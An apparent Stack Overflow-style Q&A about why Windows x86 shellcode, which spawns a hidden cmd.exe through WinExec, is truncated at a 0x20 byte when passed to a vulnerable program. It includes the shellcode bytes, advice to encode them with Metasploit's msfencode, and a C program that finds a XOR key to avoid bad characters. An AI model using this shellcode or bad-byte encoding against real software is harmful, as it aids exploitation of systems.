
Why is my shellcode truncated after the \x20 opcode when it is copied as a string onto the stack in a second vulnerable program?

--cmd.exe--
/* x86 shellcode: builds "cmd.exe " on the stack, then calls kernel32!WinExec(lpCmdLine, uCmdShow) */
char shell[] =
"\xc7\x44\x24\x0c\x65\x78\x65\x20"  /* mov dword [esp+0xc], "exe "  <- only this line is put on the stack, though there is enough space */
"\xc7\x44\x24\x08\x63\x6d\x64\x2e"  /* mov dword [esp+0x8], "cmd." */
"\x31\xc0"                          /* xor eax, eax */
"\x89\x44\x24\x04"                  /* mov [esp+4], eax      ; uCmdShow = 0 (SW_HIDE) */
"\x8d\x44\x24\x08"                  /* lea eax, [esp+8]      ; eax -> "cmd.exe " */
"\x89\x04\x24"                      /* mov [esp], eax        ; lpCmdLine */
"\x8d\x05\xad\x23\x86\x7c"          /* lea eax, [0x7c8623ad] ; absolute address the poster uses for WinExec */
"\xff\xd0";                         /* call eax */
--end shell--
Thanks Raja for the answer :]) So, I'm passing this through a C function of the kernel32.dll library, calling WinExec(), compiled with Dev-C++. I'm trying a PoC to deepen my own knowledge... What's wrong? - user296173 Mar 19, 2010 at 0:25

Yep, that would do it; the usual solution is to surround the command-line argument with quotes, but I'm not sure how the command-line parser would handle this case - after all, you're not meant to be passing around shellcode like this ;) - BlueRaja - Danny Pflughoeft Mar 19, 2010 at 13:36

My theory is that things like quote, space, null, etc. are being interpreted by the Windows shell rather than being sent through. You could escape it somehow, but I think it's easier to just encode the shellcode. So try Metasploit's msfencode utility to avoid those opcodes altogether. I know null (\x00), space (\x20) and quote (\x22) can't be passed directly, but I suppose that there are other opcodes that can't be passed as well.

That's my solution, but does anyone know of any other ones that are better?
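The answer above recommends encoding the payload so that the bytes the command-line path cannot carry never appear in it. The program below is an added example, not code from the question, the answer or msfencode: it takes a constructed copy of the poster's shellcode bytes, reports how many of them would survive being handed over as a single unquoted argv element, and then searches for a single-byte XOR key under which the encoded payload contains none of the three bytes the answer names (0x00, 0x20, 0x22). The bad-byte set, the helper names and the simplified split rule (cut at the first NUL or space) are assumptions made for the example. At run time an encoded payload also needs a small decoder stub in front of it, and that stub must itself avoid the same bytes; that part is not shown here and is what msfencode automates.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed copy of the bytes from the question's shell[] array
 * (x86, builds "cmd.exe " on the stack and calls WinExec). It is only
 * inspected by this program, never executed. */
static const unsigned char shell[] = {
    0xc7, 0x44, 0x24, 0x0c, 0x65, 0x78, 0x65, 0x20,
    0xc7, 0x44, 0x24, 0x08, 0x63, 0x6d, 0x64, 0x2e,
    0x31, 0xc0,
    0x89, 0x44, 0x24, 0x04,
    0x8d, 0x44, 0x24, 0x08,
    0x89, 0x04, 0x24,
    0x8d, 0x05, 0xad, 0x23, 0x86, 0x7c,
    0xff, 0xd0
};

/* Assumed bad-byte set, taken from the answer: NUL terminates the C string
 * before the second program sees the rest, space splits the command line
 * into arguments, and the double quote is consumed by the argument parser. */
static const unsigned char badchars[] = { 0x00, 0x20, 0x22 };

static int is_bad(unsigned char b)
{
    for (size_t i = 0; i < sizeof badchars; i++)
        if (badchars[i] == b)
            return 1;
    return 0;
}

/* Index of the first bad byte in buf, or -1 if there is none. */
long first_badchar(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (is_bad(buf[i]))
            return (long)i;
    return -1;
}

/* Simplified model of passing buf as one unquoted argv[] element:
 * the receiving program sees everything up to the first NUL or space. */
size_t argv_visible_len(const unsigned char *buf, size_t len)
{
    size_t i;
    for (i = 0; i < len; i++)
        if (buf[i] == 0x00 || buf[i] == 0x20)
            break;
    return i;
}

/* Smallest single-byte XOR key such that neither the key itself nor any
 * encoded byte is a bad char (the key matters because the decoder stub
 * has to embed it). Returns -1 if no such key exists. */
int find_xor_key(const unsigned char *buf, size_t len)
{
    for (int key = 1; key < 256; key++) {
        if (is_bad((unsigned char)key))
            continue;
        size_t i;
        for (i = 0; i < len; i++)
            if (is_bad((unsigned char)(buf[i] ^ key)))
                break;
        if (i == len)
            return key;
    }
    return -1;
}

void xor_bytes(unsigned char *dst, const unsigned char *src, size_t len, unsigned char key)
{
    for (size_t i = 0; i < len; i++)
        dst[i] = src[i] ^ key;
}

/* Encode with key, check that the result is free of bad chars and fully
 * visible through the argv split, decode again and confirm the original
 * bytes come back. Returns 1 on success, 0 otherwise. */
int xor_roundtrip_ok(const unsigned char *buf, size_t len, unsigned char key)
{
    unsigned char enc[256], dec[256];
    if (len > sizeof enc)
        return 0;
    xor_bytes(enc, buf, len, key);
    if (first_badchar(enc, len) != -1 || argv_visible_len(enc, len) != len)
        return 0;
    xor_bytes(dec, enc, len, key);
    return memcmp(dec, buf, len) == 0;
}

int main(void)
{
    size_t len = sizeof shell;
    int key = find_xor_key(shell, len);
    printf("payload length       : %zu bytes\n", len);
    printf("first bad byte at    : %ld\n", first_badchar(shell, len));
    printf("bytes surviving argv : %zu\n", argv_visible_len(shell, len));
    printf("usable XOR key       : %d\n", key);
    if (key >= 0)
        printf("encode/decode clean  : %s\n",
               xor_roundtrip_ok(shell, len, (unsigned char)key) ? "yes" : "no");
    return 0;
}
```

On the poster's bytes the split model stops at index 7, the 0x20 that ends the first line of the array, which is exactly the truncation the question describes. Keys 1 through 6 are rejected because some payload byte XORs to 0x20, 0x22 or 0x00; key 7 is the first that yields a clean payload, and the round trip confirms the original bytes are recovered.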
